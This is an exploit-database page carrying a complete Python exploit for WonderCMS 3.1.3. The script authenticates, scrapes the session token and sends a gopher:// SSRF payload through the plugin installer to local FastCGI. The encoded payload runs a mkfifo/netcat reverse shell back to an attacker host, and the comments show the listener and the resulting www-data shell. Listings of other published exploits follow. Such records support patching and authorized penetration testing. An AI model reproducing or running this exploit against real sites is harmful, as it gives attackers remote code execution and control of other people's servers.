Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution"

Author

Exploit author

zetc0de

Platform

Exploit platform

php

Release date

Exploit published date

2020-12-02

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
# Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution
# Date: 2020-11-27
# Exploit Author: zetc0de
# Vendor Homepage: https://www.wondercms.com/
# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
# Version: 3.1.3
# Tested on: Ubuntu 16.04
# CVE : N/A

# WonderCMS is vulnerable to SSRF Vulnerability.
# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.
# The theme/plugin installer not sanitize the destination of github/gitlab url, so attacker can pointing te destinaition to localhost.  
# when the attacker can pointing the request to localhost, this lead to SSRF vulnerability. 
# the most high impact lead to RCE with gopher scheme and FastCGI running in port 9000
# 
# python exploit.py
# [+] Getting Token
# [+] Sending payload
# [+] Get reverse shell

# nc -lnvp 1234
# Connection from 192.168.43.103:56956
# /bin/sh: 0: can't access tty; job control turned off
# $ whoami
# www-data
# $

import requests
from bs4 import BeautifulSoup
from termcolor import colored
from time import sleep

print(colored('''

\ \      /_ \  \ | _ \ __| _ \  __|  \  |  __| 
 \ \ \  /(   |.  | |  |_|    / (    |\/ |\__ \ 
  \_/\_/\___/_|\_|___/___|_|_\\___|_|  _|____/ 
                                               
------[  SSRF to Remote Code Execution ]------
	''',"blue"))


loginURL = "http://wonder.com/loginURL"
password = "GpIyq0RH"
lhost = "192.168.43.66"
lport = "1234"
payload = "gopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500".format(lhost,lport)


r = requests.session()
data = { "password" : password }
page = r.post(loginURL,data)
if "Wrong" in page.text:
	print(colored("[!] Exploit Failed : Wrong Credential","red"))
	exit()

print(colored("[+] Getting Token","cyan"))
soup = BeautifulSoup(page.text, "html.parser")

allscript  = soup.find_all("script")
no = 0
for i in allscript:
	if "rootURL" in str(i):
		url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
	elif "token" in str(i):
		token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")


def sendPayload(req,url,payload,token):
	getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token
	req.get(getShell)

print(colored("[+] Sending payload","cyan"))
sleep(1)
print(colored("[+] Get reverse shell","cyan"))
sendPayload(r,url,payload,token)
print(colored("[+] Good bye","cyan"))
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49154/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.